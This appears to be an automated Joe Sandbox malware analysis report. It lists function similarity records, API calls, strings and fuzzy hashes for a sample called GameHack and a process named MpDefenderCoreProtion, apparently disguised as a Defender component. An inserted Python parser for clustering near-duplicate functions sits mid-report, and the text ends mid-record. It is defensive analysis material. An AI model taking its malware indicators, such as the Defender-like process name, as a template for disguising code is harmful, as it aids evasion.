                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Shell.Explorer$about:blank
                                      • API String ID: 0-874089819
                                      • Opcode ID: c4b2e2090c999b84cb801e4a722ebf8c463a81fda7acb6fa151fc4f35e9fd088
                                      • Instruction ID: c8a47fafa66a5597b834a012b1713f1a426f0e844463f4afed97d12c4aa7140d
                                      • Opcode Fuzzy Hash: c4b2e2090c999b84cb801e4a722ebf8c463a81fda7acb6fa151fc4f35e9fd088
                                      • Instruction Fuzzy Hash: 4C2182712043989FCB18DF65C895A6A77E8FF84711B14856DF909AB287DB70EC00DB60
                                      APIs
                                        • Part of subcall function 00EDEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00EDEB92
                                        • Part of subcall function 00EDEB73: GetProcAddress.KERNEL32(00F181C0,CryptUnprotectMemory), ref: 00EDEBA2
                                      • GetCurrentProcessId.KERNEL32(?,?,?,00EDEBEC), ref: 00EDEC84
                                      Strings
                                      • CryptUnprotectMemory failed, xrefs: 00EDEC7C
                                      • CryptProtectMemory failed, xrefs: 00EDEC3B
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: fa2d0d34adc472c7d219083785ab020782ec61be68d7be0ace84c1dcff28373f
                                      • Instruction ID: 035169c674dea6e0026a7d8775ee7508e7f99666e24149402eedf9f83d908d1f
                                      • Opcode Fuzzy Hash: fa2d0d34adc472c7d219083785ab020782ec61be68d7be0ace84c1dcff28373f
                                      • Instruction Fuzzy Hash: 0F115932A112686BDB157B34DD0AAAE7758EF04764B05901BFC057F381CB75AE43A7D0
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00010000,00EE09D0,?,00000000,00000000), ref: 00EE08AD
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00EE08F4
                                        • Part of subcall function 00ED6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED6EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2655393344-3849766595
                                      • Opcode ID: d13262bb056249bc1633dfa36fd8a314911d731262db93ed97747825dcdabb88
                                      • Instruction ID: 2f19d1ddef207ce7fa4f926480a52bbe963c65d877120e8a518fc3cd857415f0
                                      • Opcode Fuzzy Hash: d13262bb056249bc1633dfa36fd8a314911d731262db93ed97747825dcdabb88
                                      • Instruction Fuzzy Hash: CF01F9B134430D6FD6246F55EC82FA67398EF84715F10043EFA86B6181CEF1A8C2A664
                                      APIs
                                        • Part of subcall function 00EDDA98: _swprintf.LIBCMT ref: 00EDDABE
                                        • Part of subcall function 00EDDA98: _strlen.LIBCMT ref: 00EDDADF
                                        • Part of subcall function 00EDDA98: SetDlgItemTextW.USER32(?,00F0E154,?), ref: 00EDDB3F
                                        • Part of subcall function 00EDDA98: GetWindowRect.USER32(?,?), ref: 00EDDB79
                                        • Part of subcall function 00EDDA98: GetClientRect.USER32(?,?), ref: 00EDDB85
                                      • GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                      • SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: 0
                                      • API String ID: 2622349952-4108050209
                                      • Opcode ID: ceaee0fb4772bd926fbfa5626195954ad8483ba0d56b0ce15e4fb4bfece363df
                                      • Instruction ID: f8fc25a3140fafb52da818ea2b5c976e653334ccf999dc0a9e009bcd02b49bb7
                                      • Opcode Fuzzy Hash: ceaee0fb4772bd926fbfa5626195954ad8483ba0d56b0ce15e4fb4bfece363df
                                      • Instruction Fuzzy Hash: ADF0AF3010438CB6DF251F618D09BE93B99FB10359F09A096FD49646A1CBB4C996FB10
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00EE0A78,?), ref: 00EE0854
                                      • GetLastError.KERNEL32(?), ref: 00EE0860
                                        • Part of subcall function 00ED6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED6EAF
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00EE0869
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: e016e7b548cbc263591c8f8f4462471ce57affa7ec82735becce4a46d07a040e
                                      • Instruction ID: ccd8578af99810c36fd277c5f635f38a09a36557c5a0c1bf5cdc9e59041339bd
                                      • Opcode Fuzzy Hash: e016e7b548cbc263591c8f8f4462471ce57affa7ec82735becce4a46d07a040e
                                      • Instruction Fuzzy Hash: 97D05B7150902126CA102724AC0ADAF7B09DF51734F500716F639752F5DF610A9265D5
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00EDD32F,?), ref: 00EDDA53
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00EDD32F,?), ref: 00EDDA61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: db73d924d1987faad825959dea99e70c3e54845cfabac72dbdf63bca17ba68fd
                                      • Instruction ID: 7b12b8c086ad6d529ae8180949f0cae8ad13c6d2e4ff26835babf26a56f15f6f
                                      • Opcode Fuzzy Hash: db73d924d1987faad825959dea99e70c3e54845cfabac72dbdf63bca17ba68fd
                                      • Instruction Fuzzy Hash: C8C0123128A75076D73017216D0DB433A4C6B10B15F05044DB185DA1D0D5E5C9459650

                                      Execution Graph

                                      Execution Coverage:6.3%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:30
                                      Total number of Limit Nodes:5
                                      execution_graph 21385 17d5f8c 21387 17d5f17 21385->21387 21386 17d5f9a 21387->21386 21390 17db718 21387->21390 21388 17d5fbe 21391 17db73d 21390->21391 21395 17db828 21391->21395 21399 17db818 21391->21399 21392 17db747 21392->21388 21396 17db84f 21395->21396 21398 17db92c 21396->21398 21403 17d7894 21396->21403 21400 17db84f 21399->21400 21401 17db92c 21400->21401 21402 17d7894 CreateActCtxA 21400->21402 21401->21401 21402->21401 21404 17dc8b8 CreateActCtxA 21403->21404 21406 17dc97b 21404->21406 21406->21406 21407 17de657 21408 17de60b DuplicateHandle 21407->21408 21410 17de667 21407->21410 21409 17de62e 21408->21409 21411 17de350 21412 17de396 GetCurrentProcess 21411->21412 21414 17de3e8 GetCurrentThread 21412->21414 21415 17de3e1 21412->21415 21416 17de41e 21414->21416 21417 17de425 GetCurrentProcess 21414->21417 21415->21414 21416->21417 21420 17de45b 21417->21420 21418 17de483 GetCurrentThreadId 21419 17de4b4 21418->21419 21420->21418

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1431 17de340-17de3df GetCurrentProcess 1436 17de3e8-17de41c GetCurrentThread 1431->1436 1437 17de3e1-17de3e7 1431->1437 1438 17de41e-17de424 1436->1438 1439 17de425-17de459 GetCurrentProcess 1436->1439 1437->1436 1438->1439 1440 17de45b-17de461 1439->1440 1441 17de462-17de47d call 17de521 1439->1441 1440->1441 1445 17de483-17de4b2 GetCurrentThreadId 1441->1445 1446 17de4bb-17de51d 1445->1446 1447 17de4b4-17de4ba 1445->1447 1447->1446
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 017DE3CE
                                      • GetCurrentThread.KERNEL32 ref: 017DE40B
                                      • GetCurrentProcess.KERNEL32 ref: 017DE448
                                      • GetCurrentThreadId.KERNEL32 ref: 017DE4A1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: bde9dd0fa4ea6fe8c9ef9576fcab3ce2a4ddc677653b808bd4df672164efe691
                                      • Instruction ID: f77b1293f9fa12952719f6044ca771257314ddb2cf023e7dc31c302926bdde85
                                      • Opcode Fuzzy Hash: bde9dd0fa4ea6fe8c9ef9576fcab3ce2a4ddc677653b808bd4df672164efe691
                                      • Instruction Fuzzy Hash: 685166B09007098FDB14DFAAD949BAEFBF1EB88314F208029E418A7390DB355945CF66

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1454 17de350-17de3df GetCurrentProcess 1458 17de3e8-17de41c GetCurrentThread 1454->1458 1459 17de3e1-17de3e7 1454->1459 1460 17de41e-17de424 1458->1460 1461 17de425-17de459 GetCurrentProcess 1458->1461 1459->1458 1460->1461 1462 17de45b-17de461 1461->1462 1463 17de462-17de47d call 17de521 1461->1463 1462->1463 1467 17de483-17de4b2 GetCurrentThreadId 1463->1467 1468 17de4bb-17de51d 1467->1468 1469 17de4b4-17de4ba 1467->1469 1469->1468
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 017DE3CE
                                      • GetCurrentThread.KERNEL32 ref: 017DE40B
                                      • GetCurrentProcess.KERNEL32 ref: 017DE448
                                      • GetCurrentThreadId.KERNEL32 ref: 017DE4A1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 5829f4c41348112df121dfcdb66961978241e44bd6fd02e96cd9f861c3be5049
                                      • Instruction ID: 7060894a78867cb3b30a0a8b68c9d2b981b317bcfabb3acda63aa2e6eda325b4
                                      • Opcode Fuzzy Hash: 5829f4c41348112df121dfcdb66961978241e44bd6fd02e96cd9f861c3be5049
                                      • Instruction Fuzzy Hash: E15156B09007498FDB14DFAAD549B9EFFF1EB88314F208029E418A7390DB755845CF65

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2232 17dc8ac-17dc979 CreateActCtxA 2234 17dc97b-17dc981 2232->2234 2235 17dc982-17dc9dc 2232->2235 2234->2235 2242 17dc9de-17dc9e1 2235->2242 2243 17dc9eb-17dc9ef 2235->2243 2242->2243 2244 17dc9f1-17dc9fd 2243->2244 2245 17dca00 2243->2245 2244->2245 2246 17dca01 2245->2246 2246->2246
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 017DC969
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 52db519163458ac1cc2709a212e3fff0964965c46cf9ccf4efd3fe94fadd3fe1
                                      • Instruction ID: 2fbae4e4c41469d9ad598f64e05e0e60dfff69e806d8fccf96bd3b993275ac22
                                      • Opcode Fuzzy Hash: 52db519163458ac1cc2709a212e3fff0964965c46cf9ccf4efd3fe94fadd3fe1
                                      • Instruction Fuzzy Hash: F741FEB5C0071DCBEB29DFAAC944B9DFBB1BF48304F20816AD408AB255DB756946CF50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2248 17d7894-17dc979 CreateActCtxA 2251 17dc97b-17dc981 2248->2251 2252 17dc982-17dc9dc 2248->2252 2251->2252 2259 17dc9de-17dc9e1 2252->2259 2260 17dc9eb-17dc9ef 2252->2260 2259->2260 2261 17dc9f1-17dc9fd 2260->2261 2262 17dca00 2260->2262 2261->2262 2263 17dca01 2262->2263 2263->2263
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 017DC969
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 873c876d300eb2147968a7b466a610c46a454afd27173751a53e3f00a91a56bc
                                      • Instruction ID: e7f0696922690b7dbc27c2762b4a39c3b93b96296a3fcc3561de966f4fd9aff8
                                      • Opcode Fuzzy Hash: 873c876d300eb2147968a7b466a610c46a454afd27173751a53e3f00a91a56bc
                                      • Instruction Fuzzy Hash: 1241E3B1C0071DCBEB25DFAAC844B9DFBB5BF48304F20816AD508AB255DB756946CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2265 17de657-17de665 2266 17de60b-17de62c DuplicateHandle 2265->2266 2267 17de667-17de786 2265->2267 2268 17de62e-17de634 2266->2268 2269 17de635-17de652 2266->2269 2268->2269
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DE61F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 4d821c4b9d776fbcbb8654a58f55a8ff02a3739d4efa8008099cbf9dc5107a54
                                      • Instruction ID: 85593bbad2850b8ef77d2f24845292a4aedd84fb22df77182b214bc3748ec382
                                      • Opcode Fuzzy Hash: 4d821c4b9d776fbcbb8654a58f55a8ff02a3739d4efa8008099cbf9dc5107a54
                                      • Instruction Fuzzy Hash: 34314BB9A613809FE7118FA5E94676D3FB2F788300F10402AF9058B3C1DB795942CF54
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DE61F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: a57a3d3ad39debd486cf5f5f12b17108370974516f2d024c8c83ac8033c9cebb
                                      • Instruction ID: c21a2e72e9cfa8b3211e638562f680505aec80e3d0ab13b358029f19da341736
                                      • Opcode Fuzzy Hash: a57a3d3ad39debd486cf5f5f12b17108370974516f2d024c8c83ac8033c9cebb
                                      • Instruction Fuzzy Hash: 5D2114B5C002099FDB10CFAAD885ADEFBF8FB48320F14801AE918A3310D378A941CF65
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DE61F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 7053d86e764bb79ae992d1de1cebc726df6951ac5b4c89385b1bfc870123b378
                                      • Instruction ID: 172a1cf58cef2e5fe526a8cd37c229b7d77424624595a1bdf4d902c23831a677
                                      • Opcode Fuzzy Hash: 7053d86e764bb79ae992d1de1cebc726df6951ac5b4c89385b1bfc870123b378
                                      • Instruction Fuzzy Hash: E121E4B5D002099FDB10CF9AD884ADEFBF8EB48320F14801AE914A7350D778A940CF65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 685b60f2c62ecc6b2f1d0626696587932335d60f3847f9f83a08f00f8febaeb9
                                      • Instruction ID: e7c182af7d88c32530725671c26b9769bc87435fb92a348f3124a3a2cee5cb77
                                      • Opcode Fuzzy Hash: 685b60f2c62ecc6b2f1d0626696587932335d60f3847f9f83a08f00f8febaeb9
                                      • Instruction Fuzzy Hash: 04A228747006118FDB29DF38E499A6EBBF2BF88314F1449A9E516CB361DB31E844CB61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dq$tPq
                                      • API String ID: 0-2605541315
                                      • Opcode ID: 7155cd7561e0af695c4a0962d5309891c7f38b547764f4c7679a95ce2c45e078
                                      • Instruction ID: 5e389046f82b3233dd32b77f3a48aff16298bb5c80c25c57518ff7e5768120f1
                                      • Opcode Fuzzy Hash: 7155cd7561e0af695c4a0962d5309891c7f38b547764f4c7679a95ce2c45e078
                                      • Instruction Fuzzy Hash: E4916E34B102158FEB19AB75E41976D7BB6FB88305F10846DE806EB390EF359C86CB61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dq$tPq
                                      • API String ID: 0-2605541315
                                      • Opcode ID: 606255d529325e9ba56a6ab9d013bae19f4f74c2d5aa05aded6a37b958df79df
                                      • Instruction ID: 4b05249b6ee215e0a04602ae4f44c7447db933fe5b47302553ca197d327b830c
                                      • Opcode Fuzzy Hash: 606255d529325e9ba56a6ab9d013bae19f4f74c2d5aa05aded6a37b958df79df
                                      • Instruction Fuzzy Hash: E4918034B10314CFDB19AB79E41976D7AA6FB88305F14846DE806EB390EF359C868B61
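The two records above carry different Opcode IDs but reference the same string (dq$tPq) and have Instruction Fuzzy Hashes that differ in only a handful of characters, which is what a near-duplicate function looks like in this part of the report. The following parser is an added example, not Joe Sandbox code: it reads records in the layout shown here, pulls the process id, dump base and process name out of the snapshot file name, and flags pairs whose instruction fuzzy hashes are close. Assumptions: the snapshot name follows hcaresult_<pid>_<run>_<base>_<process>.jbxd, and character-wise Hamming distance over the fuzzy hash string is a usable proxy for similarity (Joe Sandbox's own similarity metric is not documented on this page). The three sample records are copied from this section.

```python
"""Parse Joe Sandbox 'Similarity' records and cluster near-duplicate functions.
Added example, not Joe Sandbox code. Assumes snapshot names of the form
hcaresult_<pid>_<run>_<base>_<process>.jbxd and uses Hamming distance as a proxy."""
import re
from itertools import combinations

FIELD = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
SNAPSHOT = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+)\.jbxd$")

# Three records copied from the report section above (constructed sample input).
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
Similarity
• API ID:
• String ID: dq$tPq
• API String ID: 0-2605541315
• Opcode ID: 7155cd7561e0af695c4a0962d5309891c7f38b547764f4c7679a95ce2c45e078
• Instruction ID: 5e389046f82b3233dd32b77f3a48aff16298bb5c80c25c57518ff7e5768120f1
• Opcode Fuzzy Hash: 7155cd7561e0af695c4a0962d5309891c7f38b547764f4c7679a95ce2c45e078
• Instruction Fuzzy Hash: E4916E34B102158FEB19AB75E41976D7BB6FB88305F10846DE806EB390EF359C86CB61
Strings
Memory Dump Source
• Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
Similarity
• API ID:
• String ID: dq$tPq
• API String ID: 0-2605541315
• Opcode ID: 606255d529325e9ba56a6ab9d013bae19f4f74c2d5aa05aded6a37b958df79df
• Instruction ID: 4b05249b6ee215e0a04602ae4f44c7447db933fe5b47302553ca197d327b830c
• Opcode Fuzzy Hash: 606255d529325e9ba56a6ab9d013bae19f4f74c2d5aa05aded6a37b958df79df
• Instruction Fuzzy Hash: E4918034B10314CFDB19AB79E41976D7AA6FB88305F14846DE806EB390EF359C868B61
Strings
Memory Dump Source
• Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
Similarity
• API ID:
• String ID: C8
• API String ID: 0-392638660
• Opcode ID: 07142b7cc74a93b5aeb21bf1c779c1564af3a60341b9489bca5ec5af487e0e4a
• Instruction ID: 446d6de50fecd46d4d722ab564200ce3f049189ac7a5b8fa5d1a31e32c08f3ec
• Opcode Fuzzy Hash: 07142b7cc74a93b5aeb21bf1c779c1564af3a60341b9489bca5ec5af487e0e4a
• Instruction Fuzzy Hash: C741AE347002009FCB15DB6CE855A2EBBE6EFC82107148569E90ADF761EA30EC028B91
"""


def parse_records(text):
    """One dict per 'Memory Dump Source' record; '• Key: Value' lines become fields."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD.match(line)
        if cur is not None and m:  # labels such as Strings/Similarity carry no data
            cur[m.group(1).strip()] = m.group(2).strip()
    for rec in records:
        m = SNAPSHOT.search(rec.get("Snapshot File", ""))
        if m:  # hcaresult_<pid>_<run>_<base>_<process>.jbxd (assumed layout)
            rec["pid"], rec["process"] = int(m.group(1)), m.group(4)
            rec["dump_base"] = int(m.group(3), 16)
    return records


def hamming(a, b):
    """Character-wise distance between two equal-length fuzzy hashes."""
    return sum(x != y for x, y in zip(a, b))


def near_duplicates(records, max_distance=15):
    """Pairs with different Opcode IDs whose Instruction Fuzzy Hashes lie within
    max_distance characters. Hashes of unequal length are not comparable and are skipped."""
    pairs = []
    for r1, r2 in combinations(records, 2):
        h1, h2 = r1.get("Instruction Fuzzy Hash", ""), r2.get("Instruction Fuzzy Hash", "")
        if not h1 or len(h1) != len(h2) or r1.get("Opcode ID") == r2.get("Opcode ID"):
            continue
        d = hamming(h1, h2)
        if d <= max_distance:
            pairs.append((r1["Opcode ID"], r2["Opcode ID"], d))
    return pairs


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records from pid {recs[0]['pid']} ({recs[0]['process']})")
    for oid1, oid2, d in near_duplicates(recs):
        print(f"near-duplicate (distance {d}/{len(recs[0]['Instruction Fuzzy Hash'])}): {oid1[:12]} ~ {oid2[:12]}")
```

On the three sample records this reports a single near-duplicate pair: the two dq$tPq functions differ in 11 of 70 hash characters while the C8 function is far from both. Note that Instruction Fuzzy Hash lengths vary across records in this report (small functions produce shorter hashes), so only equal-length hashes are compared, and the threshold of 15 is a starting point to tune against a known-good corpus rather than a calibrated value.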
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C8
                                      • API String ID: 0-392638660
                                      • Opcode ID: 07142b7cc74a93b5aeb21bf1c779c1564af3a60341b9489bca5ec5af487e0e4a
                                      • Instruction ID: 446d6de50fecd46d4d722ab564200ce3f049189ac7a5b8fa5d1a31e32c08f3ec
                                      • Opcode Fuzzy Hash: 07142b7cc74a93b5aeb21bf1c779c1564af3a60341b9489bca5ec5af487e0e4a
                                      • Instruction Fuzzy Hash: C741AE347002009FCB15DB6CE855A2EBBE6EFC82107148569E90ADF761EA30EC028B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: e2f667edc8337ffab70928d87c68d9b163ca29d08c161128d95e9cd0ff816d72
